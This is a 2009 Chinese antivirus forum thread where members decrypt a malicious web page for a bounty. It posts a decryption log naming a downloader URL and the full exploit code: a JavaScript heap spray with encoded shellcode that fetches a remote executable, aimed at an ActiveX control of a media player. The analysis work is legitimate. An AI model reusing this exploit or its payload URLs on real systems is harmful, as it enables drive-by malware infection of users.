瑞星卡卡安全论坛
首页
»
技术交流区
»
恶意网站交流
»
恶意网站交流区网马解密悬赏第八期(已结束)
networkedition - 2009-7-8 13:34:00
引用:
http://www.rzgl.gov.cn/img/storm.htm
引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组
引用:
解密工具:
Freshow(中文版)
Redoce(中文版)
Malzilla (汉化版)
引用:
在线解析站点:
http://glacierlk.cn/openlab/jm.htm
http://www.cha88.cn/
引用:
注:卡卡反病毒小组成员禁止参加
引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
QoS - 2009-7-8 13:40:00
关于:hxxp://www.rzgl.gov.cn/img/storm.htm解密的日志(全体输出 - 2):
Level 0>http://www.rzgl.gov.cn/img/storm.htm
Level 1>http://www.rz168.com/edit/x.exe ●
日志由 Redoce1.9第68次修正版于 2009-7-8 下午 01:39:08 生成。
1.jpg
(81.20 K)
2009-7-8 13:40:06
就解出一个:kaka3:
happysunday2003 - 2009-7-8 14:11:00
失效了?
<meta http-equiv='refresh' content='3; url=/main.htm'>错误提示:<br><br>您访问的域名不存在,请确认输入了正确的网址。<br>系统2秒钟后将自动转向日照百事通主站,请稍候........................
networkedition - 2009-7-8 14:21:00
[复制到剪贴板]
CODE:
<html>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id='target'></object>
<body>
<SCRIPT language="JavaScript">
var shellcode1 = "tmp54EBtmp758Btmp8B3Ctmp3574tmp0378tmp56F5tmp768Btmp0320tmp33F5tmp49C9tmpAD41tmpDB33tmp0F36tmp14BEtmp3828tmp74F2tmpC108tmp0DCBtmpDA03tmpEB40tmp3BEFtmp75DFtmp5EE7tmp5E8Btmp0324tmp66DDtmp0C8Btmp8B4Btmp1C5EtmpDD03tmp048Btmp038BtmpC3C5tmp7275tmp6D6Ctmp6E6Ftmp642Etmp6C6Ctmp4300tmp5C3Atmp2e55tmp7865tmp0065tmpC033tmp0364tmp3040tmp0C78tmp408Btmp8B0Ctmp1C70tmp8BADtmp0840tmp09EBtmp408Btmp8D34tmp7C40tmp408Btmp953Ctmp8EBFtmp0E4EtmpE8ECtmpFF84tmpFFFFtmpEC83tmp8304tmp242CtmpFF3Ctmp95D0tmpBF50tmp1A36tmp702Ftmp6FE8tmpFFFFtmp8BFFtmp2454tmp8DFCtmpBA52tmpDB33tmp5353tmpEB52tmp5324tmpD0FFtmpBF5DtmpFE98tmp0E8Atmp53E8tmpFFFFtmp83FFtmp04ECtmp2C83tmp6224tmpD0FFtmp7EBFtmpE2D8tmpE873tmpFF40tmpFFFFtmpFF52tmpE8D0tmpFFD7tmpFFFFtmp7468tmp7074tmp2F3Atmp772Ftmp7777tmp722Etmp317Atmp3836tmp632Etmp6D6Ftmp652Ftmp6964tmp2F74tmp2E78tmp7865tmp0065";
var shellcode = unescape(shellcode1.replace(/tmp/g,"%u"));
var nop = "tmp9090tmp9090";
var dsffsgdfg = unescape(nop.replace(/tmp/g,"%u"));
while (dsffsgdfg.length<141) dsffsgdfg+=dsffsgdfg;
fillvcbcv = dsffsgdfg.substring(0, 141);
vcbcv = dsffsgdfg.substring(0, dsffsgdfg.length-141);
while(vcbcv.length+141<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;
gdfgdh = new Array();
for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;
var knell = '';
while (knell.length < 4057) knell+='\x0a\x0a\x0a\x0a';
target.rawParse(knell);
</script>
</body>
gtyre2 - 2009-7-8 14:23:00
暴风影音的:kaka8:
var shellcode1 = 。。。。。。。。
1
查看完整版本:
恶意网站交流区网马解密悬赏第八期(已结束)
© 2000 - 2024 Rising Corp. Ltd.